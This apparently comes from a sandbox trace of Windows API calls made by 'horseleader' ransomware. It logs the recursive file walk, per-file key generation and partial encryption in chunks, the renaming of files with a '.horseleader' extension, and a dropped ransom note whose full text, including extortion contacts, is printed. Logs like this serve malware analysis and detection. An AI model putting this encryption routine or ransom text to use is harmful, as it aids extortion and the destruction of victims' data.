GetProcessHeap () returned 0x780000 [0250.788] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0250.788] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\*") returned 74 [0250.788] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0250.789] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.789] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\.") returned 74 [0250.789] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.789] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.789] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.790] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server 
Extensions\\..") returned 75 [0250.790] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.790] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.790] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="14", cAlternateFileName="")) returned 1 [0250.790] lstrcmpiW (lpString1="14", lpString2="Windows") returned -1 [0250.790] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14") returned 75 [0250.790] lstrcmpW (lpString1="14", lpString2=".") returned 1 [0250.790] lstrcmpW (lpString1="14", lpString2="..") returned 1 [0250.790] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.790] GetProcessHeap () returned 0x780000 [0250.790] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.790] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\*") returned 77 [0250.790] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, 
ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0250.791] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.791] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\.") returned 77 [0250.791] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.791] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="..", cAlternateFileName="")) returned 1 [0250.791] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.791] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\..") returned 78 [0250.791] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.791] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.791] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="BIN", cAlternateFileName="")) returned 1 [0250.791] lstrcmpiW (lpString1="BIN", lpString2="Windows") 
returned -1 [0250.791] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN") returned 79 [0250.791] lstrcmpW (lpString1="BIN", lpString2=".") returned 1 [0250.791] lstrcmpW (lpString1="BIN", lpString2="..") returned 1 [0250.792] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.792] GetProcessHeap () returned 0x780000 [0250.792] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.792] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*") returned 81 [0250.792] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d5bfda, dwReserved1=0x1ff30e1e, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0250.793] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.793] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\.") returned 81 [0250.793] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.793] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, 
ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d5bfda, dwReserved1=0x1ff30e1e, cFileName="..", cAlternateFileName="")) returned 1 [0250.793] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.793] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\..") returned 82 [0250.793] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.793] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.793] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d5bfda, dwReserved1=0x1ff30e1e, cFileName="1033", cAlternateFileName="")) returned 1 [0250.793] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0250.794] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033") returned 84 [0250.794] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0250.794] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0250.794] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.794] GetProcessHeap () returned 0x780000 [0250.794] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 
[0250.794] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\*") returned 86 [0250.794] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\*", lpFindFileData=0x32ae6b0 | out: lpFindFileData=0x32ae6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xd1bf8a30, dwReserved1=0x338c0a12, cFileName=".", cAlternateFileName="")) returned 0x7c68e0 [0250.794] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.794] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\.") returned 86 [0250.794] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.795] FindNextFileW (in: hFindFile=0x7c68e0, lpFindFileData=0x32ae6b0 | out: lpFindFileData=0x32ae6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xd1bf8a30, dwReserved1=0x338c0a12, cFileName="..", cAlternateFileName="")) returned 1 [0250.795] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.795] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\..") returned 87 [0250.795] lstrcmpW (lpString1="..", 
lpString2=".") returned 1 [0250.796] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.796] FindNextFileW (in: hFindFile=0x7c68e0, lpFindFileData=0x32ae6b0 | out: lpFindFileData=0x32ae6b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x870ca400, ftCreationTime.dwHighDateTime=0x1cac036, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x870ca400, ftLastWriteTime.dwHighDateTime=0x1cac036, nFileSizeHigh=0x0, nFileSizeLow=0x296a5, dwReserved0=0xd1bf8a30, dwReserved1=0x338c0a12, cFileName="FPEXT.MSG", cAlternateFileName="")) returned 1 [0250.796] lstrcmpiW (lpString1="FPEXT.MSG", lpString2="Windows") returned -1 [0250.796] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 94 [0250.796] StrStrIW (lpFirst="FPEXT.MSG", lpSrch=".horseleader") returned 0x0 [0250.833] lstrcmpW (lpString1="FPEXT.MSG", lpString2="#Decrypt#.txt") returned 1 [0250.833] lstrcmpW (lpString1="FPEXT.MSG", lpString2="_uninstalling_.png") returned 1 [0250.833] lstrlenW (lpString=".testttjffg") returned 11 [0250.833] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG", lpSrch=".testttjffg") returned 0x0 [0250.833] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae5a8 | out: pbBuffer=0x32ae5a8) returned 1 [0250.833] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae5a8*, pdwDataLen=0x32ae664*=0x24, dwBufLen=0x80 | out: pbData=0x32ae5a8*, pdwDataLen=0x32ae664*=0x80) returned 1 [0250.833] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0250.834] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 94 [0250.834] StrStrW (lpFirst="FPEXT.MSG", lpSrch=".txt") returned 0x0 [0250.834] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x32ae668 | out: lpFileSize=0x32ae668*=169637) returned 1 [0250.834] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.834] ReadFile (in: hFile=0x17c, lpBuffer=0x32a95a8, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae68c, lpOverlapped=0x0 | out: lpBuffer=0x32a95a8*, lpNumberOfBytesRead=0x32ae68c*=0x5000, lpOverlapped=0x0) returned 1 [0250.837] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.837] WriteFile (in: hFile=0x17c, lpBuffer=0x32a95a8*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae68c, lpOverlapped=0x0 | out: lpBuffer=0x32a95a8*, lpNumberOfBytesWritten=0x32ae68c*=0x5000, lpOverlapped=0x0) returned 1 [0250.838] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x12352, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.839] ReadFile (in: hFile=0x17c, lpBuffer=0x32a95a8, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae68c, lpOverlapped=0x0 | out: lpBuffer=0x32a95a8*, lpNumberOfBytesRead=0x32ae68c*=0x5000, lpOverlapped=0x0) returned 1 [0250.839] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.839] WriteFile (in: hFile=0x17c, lpBuffer=0x32a95a8*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae68c, lpOverlapped=0x0 | out: lpBuffer=0x32a95a8*, 
lpNumberOfBytesWritten=0x32ae68c*=0x5000, lpOverlapped=0x0) returned 1 [0250.839] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x246a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.839] ReadFile (in: hFile=0x17c, lpBuffer=0x32a95a8, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae68c, lpOverlapped=0x0 | out: lpBuffer=0x32a95a8*, lpNumberOfBytesRead=0x32ae68c*=0x5000, lpOverlapped=0x0) returned 1 [0250.841] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.841] WriteFile (in: hFile=0x17c, lpBuffer=0x32a95a8*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae68c, lpOverlapped=0x0 | out: lpBuffer=0x32a95a8*, lpNumberOfBytesWritten=0x32ae68c*=0x5000, lpOverlapped=0x0) returned 1 [0250.841] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.841] WriteFile (in: hFile=0x17c, lpBuffer=0x32ae660*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae68c, lpOverlapped=0x0 | out: lpBuffer=0x32ae660*, lpNumberOfBytesWritten=0x32ae68c*=0x4, lpOverlapped=0x0) returned 1 [0250.841] WriteFile (in: hFile=0x17c, lpBuffer=0x32ae5a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae68c, lpOverlapped=0x0 | out: lpBuffer=0x32ae5a8*, lpNumberOfBytesWritten=0x32ae68c*=0x80, lpOverlapped=0x0) returned 1 [0250.842] CloseHandle (hObject=0x17c) returned 1 [0250.842] GetProcessHeap () returned 0x780000 [0250.842] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e61c0 [0250.842] wnsprintfW (in: pszDest=0x7e61c0, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.horseleader") returned 106 [0250.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server 
Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg.horseleader")) returned 1 [0250.843] GetProcessHeap () returned 0x780000 [0250.843] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e61c0 | out: hHeap=0x780000) returned 1 [0250.843] FindNextFileW (in: hFindFile=0x7c68e0, lpFindFileData=0x32ae6b0 | out: lpFindFileData=0x32ae6b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x870ca400, ftCreationTime.dwHighDateTime=0x1cac036, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x870ca400, ftLastWriteTime.dwHighDateTime=0x1cac036, nFileSizeHigh=0x0, nFileSizeLow=0x296a5, dwReserved0=0xd1bf8a30, dwReserved1=0x338c0a12, cFileName="FPEXT.MSG", cAlternateFileName="")) returned 0 [0250.843] FindClose (in: hFindFile=0x7c68e0 | out: hFindFile=0x7c68e0) returned 1 [0250.843] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\#Decrypt#.txt") returned 98 [0250.844] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.844] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client 
installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.844] WriteFile (in: hFile=0x15c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae6a8, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae6a8*=0x5e4, lpOverlapped=0x0) returned 1 [0250.846] lstrlenA (lpString="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") returned 1368 [0250.846] WriteFile (in: hFile=0x15c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae6a8, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae6a8*=0x558, lpOverlapped=0x0) returned 1 [0250.846] CloseHandle (hObject=0x15c) returned 1 [0250.846] GetProcessHeap () returned 0x780000 [0250.846] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.846] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c366f00, ftCreationTime.dwHighDateTime=0x1cac0be, ftLastAccessTime.dwLowDateTime=0x6193ae30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c366f00, ftLastWriteTime.dwHighDateTime=0x1cac0be, nFileSizeHigh=0x0, nFileSizeLow=0x267d78, dwReserved0=0x63d5bfda, dwReserved1=0x1ff30e1e, cFileName="FPSRVUTL.DLL", cAlternateFileName="")) returned 1 [0250.846] lstrcmpiW (lpString1="FPSRVUTL.DLL", lpString2="Windows") returned -1 [0250.846] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL") returned 92 [0250.846] StrStrIW (lpFirst="FPSRVUTL.DLL", lpSrch=".horseleader") returned 0x0 [0250.846] lstrcmpW (lpString1="FPSRVUTL.DLL", lpString2="#Decrypt#.txt") returned 1 [0250.847] lstrcmpW (lpString1="FPSRVUTL.DLL", lpString2="_uninstalling_.png") returned 1 [0250.847] lstrlenW (lpString=".testttjffg") returned 11 [0250.847] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL", lpSrch=".testttjffg") returned 0x0 [0250.847] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.847] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.847] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.848] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL") returned 92 [0250.848] StrStrW (lpFirst="FPSRVUTL.DLL", lpSrch=".txt") returned 0x0 [0250.848] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=2522488) returned 1 [0250.848] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.848] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.851] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.851] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 
